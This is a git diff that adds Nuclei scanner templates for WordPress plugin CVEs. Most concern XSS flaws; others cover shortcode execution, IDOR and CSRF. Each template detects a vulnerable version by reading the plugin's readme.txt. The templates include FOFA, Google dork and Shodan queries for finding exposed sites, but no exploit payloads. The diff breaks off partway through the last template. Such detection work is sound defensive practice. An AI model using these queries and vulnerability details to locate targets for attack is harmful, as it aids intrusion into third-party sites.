+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b7112840-f190-4867-9408-c96408f28b7a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 6.5 + cve-id: CVE-2024-12417 + metadata: + fofa-query: "wp-content/plugins/simple-link-directory/" + google-query: inurl:"/wp-content/plugins/simple-link-directory/" + shodan-query: 'vuln:CVE-2024-12417' + tags: cve,wordpress,wp-plugin,simple-link-directory,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/simple-link-directory/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "simple-link-directory" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 8.4.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12420.yaml b/poc/cve/CVE-2024-12420.yaml new file mode 100644 index 0000000000..13db15bddf --- /dev/null +++ b/poc/cve/CVE-2024-12420.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12420-bd0164689b2a5de480b05483a455d4bf + +info: + name: > + WPMobile.App — Android and iOS Mobile Application <= 11.52 - Unauthenticated Arbitrary Shortcode Execution + author: topscoder + severity: medium + description: > + The The WPMobile.App — Android and iOS Mobile Application plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 11.52. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3ad03e3f-fb3e-4a80-9eea-d24459ed62b8?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 6.5 + cve-id: CVE-2024-12420 + metadata: + fofa-query: "wp-content/plugins/wpappninja/" + google-query: inurl:"/wp-content/plugins/wpappninja/" + shodan-query: 'vuln:CVE-2024-12420' + tags: cve,wordpress,wp-plugin,wpappninja,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wpappninja/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wpappninja" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 11.52') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12421.yaml b/poc/cve/CVE-2024-12421.yaml new file mode 100644 index 0000000000..e0cf540f66 --- /dev/null +++ b/poc/cve/CVE-2024-12421.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12421-3364cc8f248f3c81c66642b52b7e4546 + +info: + name: > + Coupon Affiliates – Affiliate Plugin for WooCommerce <= 5.16.7.1 - Unauthenticated Arbitrary Shortcode Execution and Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The The Coupon Affiliates – Affiliate Plugin for WooCommerce plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 5.16.7.1. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. This functionality is also vulnerable to Reflected Cross-Site Scripting. The Cross-Site Scripting was patched in version 5.16.7.1, while the arbitrary shortcode execution was patched in 5.16.7.2. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/66b669ce-142a-48b8-9adf-620657c2db74?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 6.5 + cve-id: CVE-2024-12421 + metadata: + fofa-query: "wp-content/plugins/woo-coupon-usage/" + google-query: inurl:"/wp-content/plugins/woo-coupon-usage/" + shodan-query: 'vuln:CVE-2024-12421' + tags: cve,wordpress,wp-plugin,woo-coupon-usage,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woo-coupon-usage/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woo-coupon-usage" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.16.7.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12422-aeceb3fb45bf879d6b9a1d0dc516f06c.yaml b/poc/cve/CVE-2024-12422-aeceb3fb45bf879d6b9a1d0dc516f06c.yaml new file mode 100644 index 0000000000..fdf91bd1c9 --- /dev/null +++ b/poc/cve/CVE-2024-12422-aeceb3fb45bf879d6b9a1d0dc516f06c.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12422-aeceb3fb45bf879d6b9a1d0dc516f06c + +info: + name: > + Import Eventbrite Events <= 1.7.4 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Import Eventbrite Events plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 1.7.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f799db97-ca61-439d-94ec-a44270d1cd07?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-12422 + metadata: + fofa-query: "wp-content/plugins/import-eventbrite-events/" + google-query: inurl:"/wp-content/plugins/import-eventbrite-events/" + shodan-query: 'vuln:CVE-2024-12422' + tags: cve,wordpress,wp-plugin,import-eventbrite-events,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/import-eventbrite-events/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "import-eventbrite-events" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.7.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12446-2affa83d9110434c8964fc4fe186651f.yaml b/poc/cve/CVE-2024-12446-2affa83d9110434c8964fc4fe186651f.yaml new file mode 100644 index 0000000000..854734c487 --- /dev/null +++ b/poc/cve/CVE-2024-12446-2affa83d9110434c8964fc4fe186651f.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12446-2affa83d9110434c8964fc4fe186651f + +info: + name: > + Post to Pdf <= 1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Post to Pdf plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gmptp_single_post' shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2774e66c-2920-4578-9ab8-20d7dfd6bd6d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-12446 + metadata: + fofa-query: "wp-content/plugins/post-to-pdf/" + google-query: inurl:"/wp-content/plugins/post-to-pdf/" + shodan-query: 'vuln:CVE-2024-12446' + tags: cve,wordpress,wp-plugin,post-to-pdf,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/post-to-pdf/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "post-to-pdf" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12447-f170b29c68bc4a2c96b04066f7af171d.yaml b/poc/cve/CVE-2024-12447-f170b29c68bc4a2c96b04066f7af171d.yaml new file mode 100644 index 0000000000..70df7a4ae3 --- /dev/null +++ b/poc/cve/CVE-2024-12447-f170b29c68bc4a2c96b04066f7af171d.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12447-f170b29c68bc4a2c96b04066f7af171d + +info: + name: > + Get Post Content Shortcode <= 0.4 - Insecure Direct Object Reference to Authenticated (Contributor+) Sensitive Information Disclosure via post_content Shortcode + author: topscoder + severity: low + description: > + The Get Post Content Shortcode plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 0.4 via the 'post-content' shortcode due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Contributor-level access and above, to read the content of password-protected, private, draft, and pending posts. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c2b92091-e615-484f-b402-2e793eed214d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-12447 + metadata: + fofa-query: "wp-content/plugins/get-post-content-shortcode/" + google-query: inurl:"/wp-content/plugins/get-post-content-shortcode/" + shodan-query: 'vuln:CVE-2024-12447' + tags: cve,wordpress,wp-plugin,get-post-content-shortcode,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/get-post-content-shortcode/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "get-post-content-shortcode" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12448-b0024901f823c199e5df7414f136f048.yaml b/poc/cve/CVE-2024-12448-b0024901f823c199e5df7414f136f048.yaml new file mode 100644 index 0000000000..7aa5b7f437 --- /dev/null +++ b/poc/cve/CVE-2024-12448-b0024901f823c199e5df7414f136f048.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12448-b0024901f823c199e5df7414f136f048 + +info: + name: > + Posts and Products Views for WooCommerce <= 2.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Posts and Products Views for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'papvfwc_views' shortcode in all versions up to, and including, 2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a7e27a6c-8b14-459b-aba2-044f311edf9e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-12448 + metadata: + fofa-query: "wp-content/plugins/posts-and-products-views/" + google-query: inurl:"/wp-content/plugins/posts-and-products-views/" + shodan-query: 'vuln:CVE-2024-12448' + tags: cve,wordpress,wp-plugin,posts-and-products-views,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/posts-and-products-views/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "posts-and-products-views" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12458-e6b90e547e05531a7e2ba9dd1b97c927.yaml b/poc/cve/CVE-2024-12458-e6b90e547e05531a7e2ba9dd1b97c927.yaml new file mode 100644 index 0000000000..5b154a8026 --- /dev/null +++ b/poc/cve/CVE-2024-12458-e6b90e547e05531a7e2ba9dd1b97c927.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12458-e6b90e547e05531a7e2ba9dd1b97c927 + +info: + name: > + Smart PopUp Blaster <= 1.4.3 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Smart PopUp Blaster plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'spb-button' shortcode in all versions up to, and including, 1.4.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/afd7fe73-1f24-4e47-a0c4-5a08662c4dbe?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-12458 + metadata: + fofa-query: "wp-content/plugins/smart-popup-blaster/" + google-query: inurl:"/wp-content/plugins/smart-popup-blaster/" + shodan-query: 'vuln:CVE-2024-12458' + tags: cve,wordpress,wp-plugin,smart-popup-blaster,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/smart-popup-blaster/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "smart-popup-blaster" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12459-1c8f2c123589ae3f3e53f13d47253fcf.yaml b/poc/cve/CVE-2024-12459-1c8f2c123589ae3f3e53f13d47253fcf.yaml new file mode 100644 index 0000000000..4cbd955545 --- /dev/null +++ b/poc/cve/CVE-2024-12459-1c8f2c123589ae3f3e53f13d47253fcf.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12459-1c8f2c123589ae3f3e53f13d47253fcf + +info: + name: > + Ganohrs Toggle Shortcode <= 0.2.4 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Ganohrs Toggle Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'toggle' shortcode in all versions up to, and including, 0.2.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/efd49905-0f2c-44b7-85c6-c2b77440ac17?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-12459 + metadata: + fofa-query: "wp-content/plugins/ganohrs-toggle-shortcode/" + google-query: inurl:"/wp-content/plugins/ganohrs-toggle-shortcode/" + shodan-query: 'vuln:CVE-2024-12459' + tags: cve,wordpress,wp-plugin,ganohrs-toggle-shortcode,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ganohrs-toggle-shortcode/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ganohrs-toggle-shortcode" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.2.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12465.yaml b/poc/cve/CVE-2024-12465.yaml new file mode 100644 index 0000000000..d583917b96 --- /dev/null +++ b/poc/cve/CVE-2024-12465.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12465-cee6fb491f26feabdcf3dcaa9d9a88a9 + +info: + name: > + Property Hive Stamp Duty Calculator <= 1.0.22 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Property Hive Stamp Duty Calculator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'stamp_duty_calculator_scotland' shortcode in all versions up to, and including, 1.0.22 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f4f52cb6-eccf-4213-ae44-4a3fa738723d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-12465 + metadata: + fofa-query: "wp-content/plugins/property-hive-stamp-duty-calculator/" + google-query: inurl:"/wp-content/plugins/property-hive-stamp-duty-calculator/" + shodan-query: 'vuln:CVE-2024-12465' + tags: cve,wordpress,wp-plugin,property-hive-stamp-duty-calculator,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/property-hive-stamp-duty-calculator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "property-hive-stamp-duty-calculator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.22') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12474-143276e3178f42c70ef45aed9f8f19ab.yaml b/poc/cve/CVE-2024-12474-143276e3178f42c70ef45aed9f8f19ab.yaml new file mode 100644 index 0000000000..855526c63f --- /dev/null +++ b/poc/cve/CVE-2024-12474-143276e3178f42c70ef45aed9f8f19ab.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12474-143276e3178f42c70ef45aed9f8f19ab + +info: + name: > + GeoDataSource Country Region DropDown <= 1.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The GeoDataSource Country Region DropDown plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gds-country-dropdown' shortcode in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c974726e-9371-40e5-8664-c12c8c06e5b9?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-12474 + metadata: + fofa-query: "wp-content/plugins/geodatasource-country-region-dropdown/" + google-query: inurl:"/wp-content/plugins/geodatasource-country-region-dropdown/" + shodan-query: 'vuln:CVE-2024-12474' + tags: cve,wordpress,wp-plugin,geodatasource-country-region-dropdown,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/geodatasource-country-region-dropdown/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "geodatasource-country-region-dropdown" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12501-c27faf539f1a53d9009e9c3a53602e7a.yaml b/poc/cve/CVE-2024-12501-c27faf539f1a53d9009e9c3a53602e7a.yaml new file mode 100644 index 0000000000..35d99932c6 --- /dev/null +++ b/poc/cve/CVE-2024-12501-c27faf539f1a53d9009e9c3a53602e7a.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12501-c27faf539f1a53d9009e9c3a53602e7a + +info: + name: > + Simple Locator <= 2.0.3 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Simple Locator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in all versions up to, and including, 2.0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/38cb5e43-56d0-40b6-936a-f10f15d2e72f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-12501 + metadata: + fofa-query: "wp-content/plugins/simple-locator/" + google-query: inurl:"/wp-content/plugins/simple-locator/" + shodan-query: 'vuln:CVE-2024-12501' + tags: cve,wordpress,wp-plugin,simple-locator,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/simple-locator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "simple-locator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12502-1f199f73b33e699daa4c51027e49df2e.yaml b/poc/cve/CVE-2024-12502-1f199f73b33e699daa4c51027e49df2e.yaml new file mode 100644 index 0000000000..657df422e2 --- /dev/null +++ b/poc/cve/CVE-2024-12502-1f199f73b33e699daa4c51027e49df2e.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12502-1f199f73b33e699daa4c51027e49df2e + +info: + name: > + My IDX Home Search <= 2.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The My IDX Home Search plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'homeasap-idx-landing' shortcode in all versions up to, and including, 2.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d17aca2b-5ac6-46cd-a439-f492e6573a46?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-12502 + metadata: + fofa-query: "wp-content/plugins/my-idx-home-search/" + google-query: inurl:"/wp-content/plugins/my-idx-home-search/" + shodan-query: 'vuln:CVE-2024-12502' + tags: cve,wordpress,wp-plugin,my-idx-home-search,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/my-idx-home-search/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "my-idx-home-search" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12517-efd628a1954edd29546cb9041fe9b427.yaml b/poc/cve/CVE-2024-12517-efd628a1954edd29546cb9041fe9b427.yaml new file mode 100644 index 0000000000..625c9fc0a6 --- /dev/null +++ b/poc/cve/CVE-2024-12517-efd628a1954edd29546cb9041fe9b427.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12517-efd628a1954edd29546cb9041fe9b427 + +info: + name: > + WooCommerce Cart Count Shortcode <= 1.0.4 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The WooCommerce Cart Count Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'cart_button' shortcode in all versions up to, and including, 1.0.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8373938c-060a-4579-a133-d25b4d065d36?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-12517 + metadata: + fofa-query: "wp-content/plugins/woo-cart-count-shortcode/" + google-query: inurl:"/wp-content/plugins/woo-cart-count-shortcode/" + shodan-query: 'vuln:CVE-2024-12517' + tags: cve,wordpress,wp-plugin,woo-cart-count-shortcode,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woo-cart-count-shortcode/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woo-cart-count-shortcode" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12523-3e0bf521f24a7f7e87f4a5a124f0141d.yaml b/poc/cve/CVE-2024-12523-3e0bf521f24a7f7e87f4a5a124f0141d.yaml new file mode 100644 index 0000000000..945244c7c3 --- /dev/null +++ b/poc/cve/CVE-2024-12523-3e0bf521f24a7f7e87f4a5a124f0141d.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12523-3e0bf521f24a7f7e87f4a5a124f0141d + +info: + name: > + States Map US <= 2.4.2 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The States Map US plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'states_map' shortcode in all versions up to, and including, 2.4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/bdd07160-721b-4807-a227-72cd91faef39?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-12523 + metadata: + fofa-query: "wp-content/plugins/ymc-states-map/" + google-query: inurl:"/wp-content/plugins/ymc-states-map/" + shodan-query: 'vuln:CVE-2024-12523' + tags: cve,wordpress,wp-plugin,ymc-states-map,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ymc-states-map/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ymc-states-map" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.4.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12555-5cbce38a9099186c24f323bfe5404451.yaml b/poc/cve/CVE-2024-12555-5cbce38a9099186c24f323bfe5404451.yaml new file mode 100644 index 0000000000..b715117539 --- /dev/null +++ b/poc/cve/CVE-2024-12555-5cbce38a9099186c24f323bfe5404451.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12555-5cbce38a9099186c24f323bfe5404451 + +info: + name: > + SIP Calculator <= 1.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The SIP Calculator plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing nonce validation on a function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/03afffcc-02fe-4054-8876-6a4e4d9de071?source=api-prod + classification: + 